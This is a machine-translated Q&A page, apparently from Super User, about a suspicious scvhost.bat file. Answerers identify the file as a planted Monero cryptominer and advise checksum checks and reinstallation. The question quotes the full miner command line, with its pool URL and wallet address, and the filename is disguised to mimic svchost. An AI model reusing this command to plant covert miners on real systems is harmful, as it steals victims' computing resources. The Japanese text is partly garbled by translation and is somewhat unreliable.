cryptonightを使用したscvhost.batはウイルスですか?マイナーですか?

17

scvhost.batという名前のこの.batファイルを見つけました。ファイルにはこのコンテンツが含まれていました:

scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02

これはウイルス(情報を盗むなど)か、植え付けられた鉱夫ですか?私も暗号通貨に手を出しstratum、上記のファイルに記載されている通貨であるため、私は心配しています。

windows  batch-file  malware  cryptomining 
初心者プログラマー
ソース
1
これは確かに鉱夫のようです。自分で暗号通貨を使用する場合、自分で暗号通貨を使用する場合は、これが実際に使用するものの一部ではないことを確認してください。これを行うには、.bat拡張子を別の名前に変更し、再起動後に通常どおりにマイニングできるかどうかを確認します。このファイルについて奇妙な点の1つは、scvhostが実行するファイルの名前とbatファイルの両方であるため、通常はそれ自体を呼び出すことです。通常、それはループになります。
LPChip
2
@VirtualAnomaly sVChostをここで言及したsCVhostと間違えていると思います。はい、私はsvchostがホスティングサービスの仕組みであることをよく知っています。
LPChip
2
@LPChip謝罪、あなたは正しい、私は間違っていた。
仮想異常
2
誰かがStarcraftをプレイしすぎていたようです。
CodesInChaos
1
@lucidbrot SCVは、ゲームのレース(テラ)の1つの「ビルダー」ユニットであり、その場合は「Space Construction Vehicle」の略です。
アーロン

回答:

34

これは、特にパラメーターにマイニングプールへのURLが含まれているため、何らかのマイナーのようです。ただし、バイナリの内容を確認する必要があります。システムで見つけたバイナリのチェックサムを、マイナーの開発チームが作成したリリースと比較するのは理にかなっています。それらが異なる場合; システムが安全でないと考えてください。

もう1つの問題は、このマイナーについて(おそらく大量のCPUを使用していたために)見つけたが、システムで他に何が起こったのかわからないということです。侵入者が鉱山労働者を立ち上げることができれば、彼らは他のものも立ち上げることができたでしょう。とにかくバックアップから回復するか、新規インストールを行うことをお勧めします。

mtak
ソース
弊社のサイトを使用することにより、あなたは弊社のクッキーポリシーおよびプライバシーポリシーを読み、理解したものとみなされます。
Licensed under cc by-sa 3.0 with attribution required.